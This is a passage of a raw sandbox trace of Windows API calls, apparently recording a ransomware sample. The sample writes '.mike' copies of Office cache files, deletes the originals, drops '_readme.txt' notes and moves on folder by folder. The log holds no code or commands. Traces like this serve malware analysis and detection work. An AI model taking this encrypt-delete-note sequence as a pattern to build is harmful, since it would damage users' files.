lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0039.814] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.815] GetFileType (hFile=0x264) returned 0x1 [0039.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0039.815] GetFileType (hFile=0x264) returned 0x1 [0039.815] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0039.815] WriteFile (in: hFile=0x264, lpBuffer=0x21d2060*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x21d2060*, lpNumberOfBytesWritten=0x2af104*=0x760, lpOverlapped=0x0) returned 1 [0039.815] CloseHandle (hObject=0x264) returned 1 [0039.816] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0039.816] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.816] GetFileType (hFile=0x264) returned 0x1 [0039.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0039.816] GetFileType (hFile=0x264) returned 0x1 [0039.817] WriteFile (in: hFile=0x264, lpBuffer=0x21d5288*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x21d5288*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0039.817] CloseHandle (hObject=0x264) returned 1 [0039.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.818] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e930e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e930e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x980)) returned 1 [0039.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0039.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.818] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21d6a04 | out: lpFileInformation=0x21d6a04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e930e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e930e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x980)) returned 1 [0039.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.819] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.819] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0039.819] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.819] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0039.820] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0039.820] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0039.820] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0039.820] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0039.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0039.820] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0039.821] GetFileType (hFile=0x264) returned 0x1 [0039.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0039.821] GetFileType (hFile=0x264) returned 0x1 [0039.821] WriteFile (in: hFile=0x264, lpBuffer=0x21d86e8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21d86e8*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0039.822] CloseHandle (hObject=0x264) returned 1 [0039.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.822] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.822] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.822] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1e930e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.822] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe1e930e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e6cf80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e6cf80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1e6cf80, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPointMUI.xml.mike", cAlternateFileName="POWERP~1.MIK")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x0, dwReserved1=0x0, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e930e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e930e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x980, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e6cf80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e6cf80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0039.823] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1e6cf80, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe1e6cf80, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe1f05500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0039.823] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0039.824] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.824] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.824] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.824] CoTaskMemFree (pv=0x4fe370) [0039.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.824] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0039.824] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0039.824] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0039.824] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.863] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0039.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpFilePart=0x0) returned 0x4f [0039.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.864] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0039.864] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0039.879] GetFileType (hFile=0x264) returned 0x1 [0039.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0039.879] GetFileType (hFile=0x264) returned 0x1 [0039.879] CloseHandle (hObject=0x264) returned 1 [0039.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.879] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.879] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0039.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0039.880] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0039.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0039.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.880] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dfcd8 | out: lpFileInformation=0x21dfcd8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.880] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0039.880] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpFilePart=0x0) returned 0x4f [0039.880] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0039.880] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21e001c | out: lpFileInformation=0x21e001c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa)) returned 1 [0039.880] 